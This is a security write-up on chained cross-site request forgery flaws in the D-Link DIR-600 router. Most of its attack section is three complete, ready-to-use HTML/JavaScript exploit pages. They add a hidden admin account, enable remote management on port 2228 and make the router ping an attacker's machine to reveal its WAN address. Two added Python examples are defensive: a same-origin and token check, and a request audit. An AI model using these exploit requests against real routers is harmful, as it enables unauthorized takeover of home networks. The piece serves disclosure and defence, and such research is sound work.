1. Introduction

The intention of this article is to show how dangerous a cross-site request forgery (CSRF) vulnerability can be. It is demonstrated on the D-Link DIR-600 router (Hardware Version: Bx; Firmware Version: 2.16, which was the latest version at the time of writing this article).

CSRF is a known issue in D-Link routers (just enter "D-Link CSRF" in Google). I decided to take a look at this problem and show how CSRF vulnerabilities in three places of the admin panel can be chained to obtain unauthorized remote admin access to the device.

2. CSRF and Attack Description

Let’s briefly describe CSRF first. This vulnerability allows an attacker to forge a request on behalf of a logged-in user; as a consequence, the user’s browser performs the action the attacker chose. It is possible whenever the request requires no CSRF token and the action does not demand re-authentication (e.g. entering the current password). From the server’s perspective everything looks fine: the request carries the user’s valid authentication cookie.

Due to CSRF vulnerabilities in the admin panel of the aforementioned router the attacker can:

1. add a new admin account (R/W access)

2. enable remote management of the router

3. send a ping to a machine controlled by the attacker (this way the attacker learns the WAN IP of the router).

At this point the attacker can simply log in to the router. Let’s analyze the proof of concept, which consists of Part I and Part II (with comments).
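
As an added illustration (not code from the original article or from D-Link), the following Python function shows the server-side check that would reject all three forged requests: a same-origin check on the Origin/Referer header plus a per-session anti-CSRF token. The request dict, the token and the attacker origin http://evil.example are hypothetical; the endpoints and LAN address are the ones used in the article.

```python
from urllib.parse import urlsplit

# Defaults taken from the article: the router's LAN origin and the three
# state-changing endpoints the proof-of-concept requests post to.
ROUTER_ORIGIN = "http://192.168.0.1"
CONFIG_ENDPOINTS = {"/hedwig.cgi", "/pigwidgeon.cgi", "/diagnostic.php"}


def origin_of(url):
    """Reduce an Origin or Referer value to scheme://host[:port], or None."""
    parts = urlsplit(url)
    if not parts.scheme or not parts.netloc:
        return None
    return f"{parts.scheme}://{parts.netloc}".lower()


def config_change_allowed(request, session_token):
    """Decide whether a request may change configuration; returns (allowed, reason).

    request is a hypothetical dict with 'method', 'path', 'headers' and
    'body_token' (anti-CSRF token sent in the body, or None); session_token is
    the token the router bound to the caller's login session.
    """
    if request["method"] != "POST" or request["path"] not in CONFIG_ENDPOINTS:
        return True, "not a configuration change"
    headers = {k.lower(): v for k, v in request.get("headers", {}).items()}
    # Content-Type is deliberately not consulted: the PoC uses text/plain and
    # form encoding precisely because neither triggers a CORS preflight.
    # 1. Source check: browsers add Origin to cross-site XHR POSTs; fall back
    #    to Referer and fail closed when both are absent.
    source = headers.get("origin") or headers.get("referer")
    if source is None:
        return False, "no Origin or Referer header"
    if origin_of(source) != ROUTER_ORIGIN:
        return False, f"cross-site request from {origin_of(source)}"
    # 2. Token check: a forged request cannot read the per-session token,
    #    so a request that spoofs a same-origin source still fails here.
    if not session_token or request.get("body_token") != session_token:
        return False, "missing or wrong anti-CSRF token"
    return True, "same-origin request with a valid token"


# The article's REQUEST1 as the router sees it when a page on a constructed
# attacker origin sends it (headers copied from the PoC; no token is possible).
POC_REQUEST1 = {"method": "POST", "path": "/hedwig.cgi", "body_token": None,
                "headers": {"Origin": "http://evil.example",
                            "Content-Type": "text/plain; charset=UTF-8"}}
```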

3. Part I: Adding New Admin Account and Enabling Remote Management

Two requests are needed (REQUEST1 first, REQUEST2 second).

REQUEST1:

<html>
  <body>
    <script>
      function submitRequest()
      {
        var xhr = new XMLHttpRequest();
        xhr.open("POST", "http://192.168.0.1/hedwig.cgi", true);
        xhr.setRequestHeader("Accept", "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8");
        xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
        xhr.setRequestHeader("Content-Type", "text/plain; charset=UTF-8");
        xhr.withCredentials = true;
        var body = "<?xml version=\"1.0\" encoding=\"UTF-8\" ?>"+
"<postxml>"+
  "<module>"+
    "<service>DEVICE.ACCOUNT</service>"+
    "<device>"+
      "<account>"+
        "<seqno/>"+
        "<max>1</max>"+
        "<count>2</count>"+
        "<entry>"+
          "<name>admin</name>"+
          "<password>==OoXxGgYy==</password>"+
          "<group>0</group>"+
          "<description/>"+
        "</entry>"+
        "<entry>"+
          "<name>admin2</name>"+
          "<password>pass2</password>"+
          "<group>0</group>"+
          "<description/>"+
        "</entry>"+
      "</account>"+
      "<session>"+
        "<captcha>0</captcha>"+
        "<dummy/>"+
        "<timeout>180</timeout>"+
        "<maxsession>128</maxsession>"+
        "<maxauthorized>16</maxauthorized>"+
      "</session>"+
    "</device>"+
  "</module>"+
  "<module>"+
    "<service>HTTP.WAN-1</service>"+
    "<inf>"+
      "<web>2228</web>"+
      "<weballow>"+
        "<hostv4ip/>"+
      "</weballow>"+
    "</inf>"+
  "</module>"+
  "<module>"+
    "<service>HTTP.WAN-2</service>"+
    "<inf>"+
      "<web>2228</web>"+
      "<weballow>"+
        "<hostv4ip/>"+
      "</weballow>"+
    "</inf>"+
  "</module>"+
"</postxml>";
        xhr.send(body);
      }
    </script>
    <form action="#">
      <input type="button" value="Submit request1" onclick="submitRequest();" />
    </form>
  </body>
</html>

REQUEST2:

<html>
  <body>
    <script>
      function submitRequest()
      {
        var xhr = new XMLHttpRequest();
        xhr.open("POST", "http://192.168.0.1/pigwidgeon.cgi", true);
        xhr.setRequestHeader("Accept", "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8");
        xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
        xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded; charset=UTF-8");
        xhr.withCredentials = true;
        var body = "ACTIONS=SETCFG%2CSAVE%2CACTIVATE";
        xhr.send(body);
      }
    </script>
    <form action="#">
      <input type="button" value="Submit request2" onclick="submitRequest();" />
    </form>
  </body>
</html>

Comments for REQUEST1 and REQUEST2: the LAN IP is 192.168.0.1 by default. The name of the admin account is admin by default and can’t be changed in the GUI. The admin password is left unchanged when ==OoXxGgYy== is sent in the request. That’s why REQUEST1 doesn’t change the password of admin but adds a new admin account (admin2, pass2) with R/W access; it also enables remote management on port 2228. REQUEST2 then commits that configuration (ACTIONS=SETCFG,SAVE,ACTIVATE).
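
As an added example (not part of the original article), the following Python audit routine parses a hedwig.cgi <postxml> body such as REQUEST1 and reports the privilege-relevant changes it asks for: accounts that are not already known, passwords of known accounts that would be replaced (the ==OoXxGgYy== sentinel means "unchanged") and WAN interfaces on which the web admin UI would be enabled. The sample body is REQUEST1 trimmed to the elements the audit reads; the function names are hypothetical.

```python
import xml.etree.ElementTree as ET

# Sentinel the DIR-600 GUI sends in place of a password that must stay as it is
# (see the article's comment on REQUEST1).
UNCHANGED_PASSWORD = "==OoXxGgYy=="

# The <postxml> body of REQUEST1 above, with the elements the audit does not
# read left out.
REQUEST1_BODY = """<postxml>
  <module><service>DEVICE.ACCOUNT</service><device><account>
    <entry><name>admin</name><password>==OoXxGgYy==</password><group>0</group></entry>
    <entry><name>admin2</name><password>pass2</password><group>0</group></entry>
  </account></device></module>
  <module><service>HTTP.WAN-1</service><inf><web>2228</web></inf></module>
  <module><service>HTTP.WAN-2</service><inf><web>2228</web></inf></module>
</postxml>"""


def audit_postxml(body, known_accounts=("admin",)):
    """Summarise what a hedwig.cgi <postxml> body would change.

    Returns accounts that are not in known_accounts as (name, group), known
    accounts whose password would be replaced, and every HTTP.WAN-* module
    that sets a <web> port, i.e. exposes the admin UI on that WAN interface.
    """
    report = {"new_accounts": [], "password_changes": [], "remote_mgmt": []}
    for module in ET.fromstring(body).findall("module"):
        service = module.findtext("service", default="")
        if service == "DEVICE.ACCOUNT":
            for entry in module.findall("device/account/entry"):
                name = entry.findtext("name", default="")
                if name not in known_accounts:
                    # group 0 is the group the PoC uses for R/W admin accounts
                    report["new_accounts"].append((name, entry.findtext("group", default="")))
                elif entry.findtext("password", default="") != UNCHANGED_PASSWORD:
                    report["password_changes"].append(name)
        elif service.startswith("HTTP.WAN-"):
            port = module.findtext("inf/web", default="")
            if port:
                report["remote_mgmt"].append((service, int(port)))
    return report


def is_privilege_change(report):
    """True when the body adds an account, replaces a password or enables
    remote management: the cases worth logging or requiring re-authentication."""
    return any(report.values())
```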

Now the attacker needs to know the WAN IP of the router (described in Part II).

4. Part II: Sending Ping to Machine Controlled by the Attacker

One request is needed.

REQUEST3:

<html>
  <body>
    <script>
      function submitRequest()
      {
        var xhr = new XMLHttpRequest();
        xhr.open("POST", "http://192.168.0.1/diagnostic.php", true);
        xhr.setRequestHeader("Accept", "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8");
        xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
        xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded; charset=UTF-8");
        xhr.withCredentials = true;
        var body = "act=ping&dst=X.Y.Z.W";
        xhr.send(body);
      }
    </script>
    <form action="#">
      <input type="button" value="Submit request3" onclick="submitRequest();" />
    </form>
  </body>
</html>

Comment: replace X.Y.Z.W with the IP address of the machine that should receive the ping.

At this point the attacker can just log in to the router.

5. Summary

It was shown how severe the consequences of a CSRF vulnerability can be. Due to CSRF vulnerabilities in the admin panel of the D-Link DIR-600 router (Hardware Version: Bx; Firmware Version: 2.16, the latest version at the time of writing this article) the attacker can get unauthorized remote admin access to the device (three requests are needed to make it happen).